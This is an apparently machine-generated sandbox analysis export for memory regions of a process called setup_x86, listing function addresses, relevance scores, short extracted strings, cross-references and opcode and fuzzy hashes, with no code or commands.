Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: _b($(_b($Hcz4
API String ID: 0-440938004
Opcode ID: efbdeb854027b48ac63cc5eae07721eda923b5462c550cd576a155360db46049
Instruction ID: 45d4eefbe99f2ef6836ba854dbc48866c5326ee0434efa6e810bc1212ef6eb99
Opcode Fuzzy Hash: efbdeb854027b48ac63cc5eae07721eda923b5462c550cd576a155360db46049
Instruction Fuzzy Hash: 86226E32A0F68A5FD795DF68D8655E97BE1FF87320F0802BBD449CB192DA2C6806C741

Function 00007FFD348DA0F8 Relevance: 3.0, Strings: 1, Instructions: 1751COMMON

Download Yara Rule

Strings

(, xrefs: 00007FFD3491AB85

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 1a8cf15569d44c655efa720fb492ea0476aaa2a5fc68c20bc1b5c4231d9d26e1
Instruction ID: ba7a2ba993daa4dbd90e075da893315fe5f54a7e3a08f221f85c8adb60f1aa7b
Opcode Fuzzy Hash: 1a8cf15569d44c655efa720fb492ea0476aaa2a5fc68c20bc1b5c4231d9d26e1
Instruction Fuzzy Hash: A3D23E7071CA498FDBA8DB18C4A5AA5B7E1FFA9300F10457ED18EC7296DE38E841DB41

Function 00007FFD348DA0D0 Relevance: 2.2, Strings: 1, Instructions: 946COMMON

Download Yara Rule

Strings

RH_H, xrefs: 00007FFD3491959F

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: RH_H
API String ID: 0-2079149172
Opcode ID: 723067a2f92b00d47175f98899023a0b3649a8239e6151dee2145b0047bb4adf
Instruction ID: e5ee1c0245e25eb151d4bd11b6a915347ca724a54f7b18a260867477f0289657
Opcode Fuzzy Hash: 723067a2f92b00d47175f98899023a0b3649a8239e6151dee2145b0047bb4adf
Instruction Fuzzy Hash: 58529071B08A0A4FEB98EA1894A567573D2FF99304F1441BED54EC72C6DE38EC42DB81

Function 00007FFD348CD3D5 Relevance: 2.0, Strings: 1, Instructions: 719COMMON

Download Yara Rule

Strings

W]H, xrefs: 00007FFD348CD691

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: W]H
API String ID: 0-901698552
Opcode ID: e8cb585522916d7b2e2ad7dd0d3fbe2d14a966e028da6dd1f7d2cc3881429e1a
Instruction ID: d5012b12ef1afdcbd7d179b0ef1cc751462408ab26eeaee77fbe6ff136478e1c
Opcode Fuzzy Hash: e8cb585522916d7b2e2ad7dd0d3fbe2d14a966e028da6dd1f7d2cc3881429e1a
Instruction Fuzzy Hash: 05221931A0CA894FE755EB2898656F9BBE1FF86324F0401BBD549C71D2DE3DAC068781

Function 00007FFD348C108D Relevance: 1.8, Strings: 1, Instructions: 515COMMON

Download Yara Rule

Strings

k>L_^, xrefs: 00007FFD348C121F

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: k>L_^
API String ID: 0-2044548932
Opcode ID: 2b48eb07ccddaa3d8a47bb879e0a3bf76403b06078117b7e25c452ec007ebbb7
Instruction ID: a1a8cf2b5eaf096bdf496f994dfeae3d4904c60015d58fd303f7858b540c8805
Opcode Fuzzy Hash: 2b48eb07ccddaa3d8a47bb879e0a3bf76403b06078117b7e25c452ec007ebbb7
Instruction Fuzzy Hash: C512AE30A0968A4FEB95EFA8C8A56E9B7A1FF47310F0401BAD149D72D2CE3D6C45CB41

Function 00007FFD34A935A2 Relevance: 1.4, Instructions: 1425COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2893602602.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd34a80000_setup_x86.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c61097c2b10cf17f4c374f3ea840feeffefa318aa7fe066792056b2bb59ee56c
Instruction ID: b45a7bde7eec6253cfc220ce98bf2342d47eebc083276e54ab8b799ce6c00d77
Opcode Fuzzy Hash: c61097c2b10cf17f4c374f3ea840feeffefa318aa7fe066792056b2bb59ee56c
Instruction Fuzzy Hash: 58B28530609A4E8FDBD8EF68C4A56A977E1FF59314F600569D41ACB296CF39EC42CB40

Function 00007FFD34913E20 Relevance: .8, Instructions: 797COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 561ef247725f915be5a22f5b8dadb1cb9509f836f5b9b4c5d207e3e3b1cdb28b
Instruction ID: f19ecdfc9eb2e97fc9b425a5e7a3ac2c6e2838b63597ed41756ba5199b21bc41
Opcode Fuzzy Hash: 561ef247725f915be5a22f5b8dadb1cb9509f836f5b9b4c5d207e3e3b1cdb28b
Instruction Fuzzy Hash: 85429131B18A464FDB98EA18C4A1A7573E1FFA9314F1445BDD14EC369ACE39F842C790

Function 00007FFD34913DA8 Relevance: .8, Instructions: 773COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71d68988b8e3834111e8961f58287a91ce99361d9bdd1a3804a8bc39c1b64648
Instruction ID: 5a671bb3388774d3390d5122baf4a30a5bb7f735a971c4a9c5f2227cdc39b20f
Opcode Fuzzy Hash: 71d68988b8e3834111e8961f58287a91ce99361d9bdd1a3804a8bc39c1b64648
Instruction Fuzzy Hash: 5F426F30A18A498FEBA8DB18C4A4BA577E1FF59300F1441BDC54EC7296CE38F882DB51

Function 00007FFD3491BE88 Relevance: .7, Instructions: 681COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 586ef8538c0b4467591e34721162ad5bf0e338c3d4579b23c4c7b3ee3301f1ea
Instruction ID: 34fade160f04656d6f41ec941d7f24b50cd2ca6ecc5c8e17f3c30607ed51b35c
Opcode Fuzzy Hash: 586ef8538c0b4467591e34721162ad5bf0e338c3d4579b23c4c7b3ee3301f1ea
Instruction Fuzzy Hash: 7A221331A0DB854FEB56DB2888A15657BE1EF5B300F0941FFD089C7197DE2CA846C792

Function 00007FFD348DBCE3 Relevance: .6, Instructions: 555COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a99e7985cb4343d3e0ebf28b712134d1e333c08696f272fae9dce51430cd71e
Instruction ID: 66236b688bb551342e4b0b5706539e1a0d28ae7d9f049379ff94b9a45665f543
Opcode Fuzzy Hash: 8a99e7985cb4343d3e0ebf28b712134d1e333c08696f272fae9dce51430cd71e
Instruction Fuzzy Hash: B212B931709A4E8FDBC5EF6CC4A4AA577E1FF9A314B1406A9D41DC7296CA39EC42CB40

Function 00007FFD34A8AB18 Relevance: .3, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2893602602.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd34a80000_setup_x86.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c8198f1e6ae3cb69ec791932501ae1968810851ca2c05bd18758fe9302dca53
Instruction ID: 30028e408463b7eb01b2c986b49df484d39f46160fdbf5342dac1c6b9b7c60ca
Opcode Fuzzy Hash: 8c8198f1e6ae3cb69ec791932501ae1968810851ca2c05bd18758fe9302dca53
Instruction Fuzzy Hash: 3C911B63B1CE4A0FE7A8A6AD54A56B57BD1EFA9324B1401BFD54EC31C3DD18BC468380

Function 00007FFD348DB128 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7734ae7f67514e7ffb514bf364ef94d37bc2290443f29d409f181dafdca5bd0
Instruction ID: 49442069ce365032f349151558bc09e2174c5bf640d075fcfe55a19f7c671992
Opcode Fuzzy Hash: f7734ae7f67514e7ffb514bf364ef94d37bc2290443f29d409f181dafdca5bd0
Instruction Fuzzy Hash: 6B51C826A0F5960FE7669B6C58B61E977D0EF53364F0803B6C598CB0D3ED1C640BA292

Function 00007FFD348C9D6C Relevance: 57.2, Strings: 44, Instructions: 2211COMMON

Download Yara Rule

Strings

x7b(, xrefs: 00007FFD348CB201
p7b(, xrefs: 00007FFD348CAB6B
H7b(, xrefs: 00007FFD348CB261
p7b(, xrefs: 00007FFD348CB083
p7b(, xrefs: 00007FFD348CA653
`7b(, xrefs: 00007FFD348C9F76
p7b(, xrefs: 00007FFD348CA13B
`8b(, xrefs: 00007FFD348CB241
p7b(, xrefs: 00007FFD348CA982
p7b(, xrefs: 00007FFD348CA8DF
08b(, xrefs: 00007FFD348CAE2D
p7b(, xrefs: 00007FFD348CAFE0
P7b(, xrefs: 00007FFD348C9F40
p7b(, xrefs: 00007FFD348CACB1
p7b(, xrefs: 00007FFD348CA83C
p7b(, xrefs: 00007FFD348CAA25
h8b(, xrefs: 00007FFD348CB323
p7b(, xrefs: 00007FFD348CA3C7
X8b(, xrefs: 00007FFD348CB221
h7b(, xrefs: 00007FFD348C9FEA
p7b(, xrefs: 00007FFD348CAAC8
p7b(, xrefs: 00007FFD348CAE9A
h}{4, xrefs: 00007FFD348C9DF3
8b(, xrefs: 00007FFD348CACE7
p7b(, xrefs: 00007FFD348CAC0E
7b(, xrefs: 00007FFD348CA872
p7b(, xrefs: 00007FFD348CA098
P8b(, xrefs: 00007FFD348CB0B9
p7b(, xrefs: 00007FFD348CA324
p7b(, xrefs: 00007FFD348CA1DE
p7b(, xrefs: 00007FFD348CA50D
p7b(, xrefs: 00007FFD348CA6F6
p7b(, xrefs: 00007FFD348CAD54
7b(, xrefs: 00007FFD348CB1E1
H8b(, xrefs: 00007FFD348CB016
p7b(, xrefs: 00007FFD348CA46A
88b(, xrefs: 00007FFD348CAED0
p7b(, xrefs: 00007FFD348CADF7
p7b(, xrefs: 00007FFD348CA799
p7b(, xrefs: 00007FFD348CA281
p7b(, xrefs: 00007FFD348CA5B0
p7b(, xrefs: 00007FFD348CAF3D
@8b(, xrefs: 00007FFD348CAF73
(8b(, xrefs: 00007FFD348CAD8A

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: 8b($(8b($08b($88b($@8b($H7b($H8b($P7b($P8b($X8b($`7b($`8b($h7b($h8b($h}{4$p7b($p7b($p7b($p7b($p7b($p7b($p7b($p7b($p7b($p7b($p7b($p7b($p7b($p7b($p7b($p7b($p7b($p7b($p7b($p7b($p7b($p7b($p7b($p7b($p7b($p7b($x7b($7b($7b(
API String ID: 0-2430444180
Opcode ID: 23557f10a5754808ab914cbfe26c097f1fd865ddc3a04d185bb5f623100c11e2
Instruction ID: 2e62ab50b7285ecf3e94694f2395a15d617b245b4124dd0cca6458625e5dfd0f
Opcode Fuzzy Hash: 23557f10a5754808ab914cbfe26c097f1fd865ddc3a04d185bb5f623100c11e2
Instruction Fuzzy Hash: 49030074608A498FDBC5EF68C4A8BE977E1FF59314F1804B9D85DCB266DA399C42CB00

Function 00007FFD348C7BA6 Relevance: 28.7, Strings: 21, Instructions: 2433
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

[b(, xrefs: 00007FFD348C7FC6
(, xrefs: 00007FFD348C7DC4
[b(, xrefs: 00007FFD348C80AC
[b(, xrefs: 00007FFD348C81A9
[b(, xrefs: 00007FFD348C7D96
h}{4, xrefs: 00007FFD348C956B
[b(, xrefs: 00007FFD348C7BD7
[b(, xrefs: 00007FFD348C7F55
[b(, xrefs: 00007FFD348C7D01
H7b(, xrefs: 00007FFD348C879B
h}{4, xrefs: 00007FFD348C952F
[b(, xrefs: 00007FFD348C805B
[b(, xrefs: 00007FFD348C823E
[b(, xrefs: 00007FFD348C8114
[b(, xrefs: 00007FFD348C807F
[b(, xrefs: 00007FFD348C7E2B
[b(, xrefs: 00007FFD348C7EC0
[b(, xrefs: 00007FFD348C7C6C
h}{4, xrefs: 00007FFD348C9481
h}{4, xrefs: 00007FFD348C949F
[b(, xrefs: 00007FFD348C7FEA

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: [b($ [b($ [b($ [b($ [b($ [b($ [b($ [b($ [b($ [b($ [b($ [b($($H7b($h}{4$h}{4$h}{4$h}{4$[b($[b($[b(
API String ID: 0-261810132
Opcode ID: c6d89647729e8ca98a4787bebd847034adbf20c80feaab2fdc996bf78f7bc5f4
Instruction ID: 1b09b9b2a8c08764675a85565095178765f677d56bac669d5bbd7845629011e9
Opcode Fuzzy Hash: c6d89647729e8ca98a4787bebd847034adbf20c80feaab2fdc996bf78f7bc5f4
Instruction Fuzzy Hash: 06138374608A4E8FDB85EF58C8A4BEA77E1FF59300F1445BAE41DD7296DA34E842CB40

Function 00007FFD348C74FF Relevance: 17.9, Strings: 14, Instructions: 440
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

h[b(, xrefs: 00007FFD348C771A
[b(, xrefs: 00007FFD348C7588
`, xrefs: 00007FFD348C781C
`[b(, xrefs: 00007FFD348C7688
X[b(, xrefs: 00007FFD348C75F6
[b(, xrefs: 00007FFD348C761A
[b(, xrefs: 00007FFD348C78F4
P[b(, xrefs: 00007FFD348C7564
[b(, xrefs: 00007FFD348C77D0
[b(, xrefs: 00007FFD348C7862
[b(, xrefs: 00007FFD348C773E
x[b(, xrefs: 00007FFD348C783E
p[b(, xrefs: 00007FFD348C77AC
[b(, xrefs: 00007FFD348C76AC

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: [b($ [b($ [b($ [b($ [b($ [b($ [b($P[b($X[b($`$`[b($h[b($p[b($x[b(
API String ID: 0-4054575030
Opcode ID: 7305c0622f8dbf5dddc6f7d8ea64a44e95bb9aca068eb4db109f60120a3cb3b9
Instruction ID: aaf2754ab894202c97ab82926dc251d9b99370f34e34b868d8eb360fec485e7e
Opcode Fuzzy Hash: 7305c0622f8dbf5dddc6f7d8ea64a44e95bb9aca068eb4db109f60120a3cb3b9
Instruction Fuzzy Hash: F1E1F6A1A0EACB4FE795EBB855786A5BBE1EF43220B0844FBD049D7097DD2C6C05C301

Function 00007FFD348CDB93 Relevance: 12.0, Strings: 9, Instructions: 791
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

9b(, xrefs: 00007FFD348CDBD6
P:b(, xrefs: 00007FFD348CDE3B
p:b(, xrefs: 00007FFD348CDF36
`:b(, xrefs: 00007FFD348CDEDE
0:b(, xrefs: 00007FFD348CDD98
:b(, xrefs: 00007FFD348CDD02
X:b(, xrefs: 00007FFD348CDE93
@:b(, xrefs: 00007FFD348CDDE3
(:b(, xrefs: 00007FFD348CDD4D

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: :b($(:b($0:b($@:b($P:b($X:b($`:b($p:b($9b(
API String ID: 0-1270998840
Opcode ID: 2cef926452850b5f71b61597478a84ec6c5ec3f15796aa167527ec77e406b26c
Instruction ID: 177b56f30417afed3370492cf78f557232a98d3c006d31c6ac3024c7252aaddb
Opcode Fuzzy Hash: 2cef926452850b5f71b61597478a84ec6c5ec3f15796aa167527ec77e406b26c
Instruction Fuzzy Hash: 66629571A0E7C59FD356EBB4447A6A9BFE0EF07220B1804EEC486CB1A7EA6C5C45C711

Function 00007FFD348D49D0 Relevance: 7.9, Strings: 6, Instructions: 414
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8_b(, xrefs: 00007FFD348D5A18
@_b(, xrefs: 00007FFD348D592E
@_b(, xrefs: 00007FFD348D5A04
H_b(, xrefs: 00007FFD348D58B5
H_b(, xrefs: 00007FFD348D591A
8_b(, xrefs: 00007FFD348D5AF0

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: 8_b($8_b($@_b($@_b($H_b($H_b(
API String ID: 0-1032504577
Opcode ID: 6a1578503f906a74094b0623f26146bed952c53d1dd59f91554c61afa6622643
Instruction ID: cd82283e43802cca75e57fb0544633b9c6168e07e2b4815253be7ab254d2d675
Opcode Fuzzy Hash: 6a1578503f906a74094b0623f26146bed952c53d1dd59f91554c61afa6622643
Instruction Fuzzy Hash: DBD1C970A1BA4A8FDBD9DF68C4A56A977E1FF5A310F10457ED00AC7295DE38AC42CB40

Function 00007FFD348C6FFA Relevance: 7.9, Strings: 6, Instructions: 397
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

[b(, xrefs: 00007FFD348C72AE
([b(, xrefs: 00007FFD348C728A
[b(, xrefs: 00007FFD348C7340
0[b(, xrefs: 00007FFD348C731C
@7b(, xrefs: 00007FFD348C71BC
[b(, xrefs: 00007FFD348C70DD

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: [b($ [b($ [b($([b($0[b($@7b(
API String ID: 0-3979079729
Opcode ID: e9660e1786bc7453d917da701fd940fab5c56598ee5e30c73b9addc025ef6354
Instruction ID: 68e7975f9180b83390a323c742a903a1a2780786658b9141be83ed078c33bea2
Opcode Fuzzy Hash: e9660e1786bc7453d917da701fd940fab5c56598ee5e30c73b9addc025ef6354
Instruction Fuzzy Hash: 35C1E661B0EA8A0FE795EB6859742A9BFE1EF46310F0805FBD549CB1D7D92CAC058341

Function 00007FFD348CB163 Relevance: 6.7, Strings: 5, Instructions: 459
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

x7b(, xrefs: 00007FFD348CB201
7b(, xrefs: 00007FFD348CB1E1
H7b(, xrefs: 00007FFD348CB261
`8b(, xrefs: 00007FFD348CB241
X8b(, xrefs: 00007FFD348CB221

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: H7b($X8b($`8b($x7b($7b(
API String ID: 0-3957114325
Opcode ID: ec57b22977e5d6873b6083f89acd6eddac65de2de10fd3c109eb2666dfa0509e
Instruction ID: a329222f6722135eef38fea2a4647164a81a1b030ffe41afe5b9df51e81804a1
Opcode Fuzzy Hash: ec57b22977e5d6873b6083f89acd6eddac65de2de10fd3c109eb2666dfa0509e
Instruction Fuzzy Hash: 78F19774608A4D8FDBC4EF18C898BEA77E1FB68315F14057AD81DCB255DB369892CB40

Function 00007FFD348CF470 Relevance: 5.4, Strings: 4, Instructions: 418COMMON

Download Yara Rule

Strings

HA{4, xrefs: 00007FFD348E17D9
HA{4, xrefs: 00007FFD348E17C2
HA{4, xrefs: 00007FFD348E1815
HA{4, xrefs: 00007FFD348E182C

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: HA{4$HA{4$HA{4$HA{4
API String ID: 0-2747892219
Opcode ID: a805a1cd09faa565aafab5ef4dfabe7b989be39dd5df633cbe1362d9c509ef20
Instruction ID: 470dc8fb97169ee6794bd53bec37424d0caf59ad2f072dfd557687185addd9d6
Opcode Fuzzy Hash: a805a1cd09faa565aafab5ef4dfabe7b989be39dd5df633cbe1362d9c509ef20
Instruction Fuzzy Hash: 94C1FA62F18D460FEB9DD76884B56B6A3D1EFA6710B0841BBD04EC72D7DD2CA8469380

Function 00007FFD348C2728 Relevance: 5.3, Strings: 4, Instructions: 321COMMON

Download Yara Rule

Strings

HA{4, xrefs: 00007FFD348C2966
HA{4, xrefs: 00007FFD348C29B4
HA{4, xrefs: 00007FFD348C2922
{', xrefs: 00007FFD348C27FC

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: HA{4$HA{4$HA{4${'
API String ID: 0-465118169
Opcode ID: 430ce939bd74f39e9d88ee3d34ed6942cf326a7f79290a2d9179ca0ffec569ca
Instruction ID: 38355add7cc192f47c958d58660d29a91fec95bef503b21b1ccd914303bfbb7b
Opcode Fuzzy Hash: 430ce939bd74f39e9d88ee3d34ed6942cf326a7f79290a2d9179ca0ffec569ca
Instruction Fuzzy Hash: C7910A72F1CA494FDBA5EB1C98956B9B7E1FF99310F00027AD04ED3292DE34AC469781

Function 00007FFD348C0E18 Relevance: 5.3, Strings: 4, Instructions: 320COMMON

Download Yara Rule

Strings

HA{4, xrefs: 00007FFD348C2966
HA{4, xrefs: 00007FFD348C29B4
HA{4, xrefs: 00007FFD348C2922
{', xrefs: 00007FFD348C27FC

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: HA{4$HA{4$HA{4${'
API String ID: 0-465118169
Opcode ID: fb6a0a964d49f48492e097bab48b2e747899ce6e4f0f2140c6456d8cd4cf3be4
Instruction ID: 5badd4aac09874f217bd728ee9506a24a28135d8cab1993f51b0f6d69b9dbee6
Opcode Fuzzy Hash: fb6a0a964d49f48492e097bab48b2e747899ce6e4f0f2140c6456d8cd4cf3be4
Instruction Fuzzy Hash: 1E910872F1CA494FDBA5EB1C98956B9B7E1FF99310F00027AD04ED3292DE34AC469781

Function 00007FFD348D1428 Relevance: 4.3, Strings: 3, Instructions: 594COMMON

Download Yara Rule

Strings

^b(, xrefs: 00007FFD348D162C
Hcz4, xrefs: 00007FFD348D161A
(^b(, xrefs: 00007FFD348D1608

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: ^b($(^b($Hcz4
API String ID: 0-192214799
Opcode ID: d346a5e4c3986c965cf5512ccec8b6a449b82a840865d69d1ce3928e2fe1d390
Instruction ID: 1b7318be9abc715d564080f15ff69af52ee007077b60863c9afc33fa7be02f45
Opcode Fuzzy Hash: d346a5e4c3986c965cf5512ccec8b6a449b82a840865d69d1ce3928e2fe1d390
Instruction Fuzzy Hash: 4322B671B09A4E8FDB94EF58C4A46A977E2FF5A310F1446A9D41DC7296CB38EC42CB40

Function 00007FFD348D9060 Relevance: 4.0, Strings: 3, Instructions: 222COMMON

Download Yara Rule

Strings

X c(, xrefs: 00007FFD348F2F92
` c(, xrefs: 00007FFD348F2FB8
` c(, xrefs: 00007FFD348F2F60

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: X c($` c($` c(
API String ID: 0-3947433521
Opcode ID: 62e5cb538fb10c236493c00044867fb0af3f1b378c4d85d418c94b6cf27c762c
Instruction ID: 24cc216e295978892c9628129ca150953322a6bafe3a309f2b12a0bd6491d6e5
Opcode Fuzzy Hash: 62e5cb538fb10c236493c00044867fb0af3f1b378c4d85d418c94b6cf27c762c
Instruction Fuzzy Hash: C9614D317189498FDBA4EB6CD4A8B6537E1FF5A300F1500F9E44ECB2A2DA28EC45C741

Function 00007FFD348C73DB Relevance: 3.8, Strings: 3, Instructions: 85COMMON

Download Yara Rule

Strings

@[b(, xrefs: 00007FFD348C7440
[b(, xrefs: 00007FFD348C7464
[b(, xrefs: 00007FFD348C73D2

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: [b($ [b($@[b(
API String ID: 0-2629152945
Opcode ID: 390b3da8a8613def0b1d140ff677e052eaf0f4eafa5e00c58decc82dd21b93ef
Instruction ID: c357b8fec68510eb429bfdf7acbe14bbd10044edec3d096361b582f6b964cd0c
Opcode Fuzzy Hash: 390b3da8a8613def0b1d140ff677e052eaf0f4eafa5e00c58decc82dd21b93ef
Instruction Fuzzy Hash: 572128A1A0EACB0FE796AB7845755B9BFE2AF43210B0808FAD449CB097DD2C6C05D341

Function 00007FFD348CE6F5 Relevance: 3.2, Strings: 2, Instructions: 733COMMON

Download Yara Rule

Strings

b(, xrefs: 00007FFD348CE793
Hcz4, xrefs: 00007FFD348CE7B9

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: b($Hcz4
API String ID: 0-3525220300
Opcode ID: 0c61b73e8d2060c1c6fa03a8eeca9f93ee831353ffbd5935afda2c0a1184da33
Instruction ID: 263d5b726e1792d87a4e0f850256b14d51179c038e62e36578996bf847d8cc06
Opcode Fuzzy Hash: 0c61b73e8d2060c1c6fa03a8eeca9f93ee831353ffbd5935afda2c0a1184da33
Instruction Fuzzy Hash: 72428235B18A4A8FDB98EF58C4A5AB9B3E1FF59300F144579D41EC7296DA38EC42CB40

Function 00007FFD348D65CB Relevance: 2.8, Strings: 2, Instructions: 308COMMON

Download Yara Rule

Strings

P_b(, xrefs: 00007FFD348D6672
X_b(, xrefs: 00007FFD348D6684

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: P_b($X_b(
API String ID: 0-3505195262
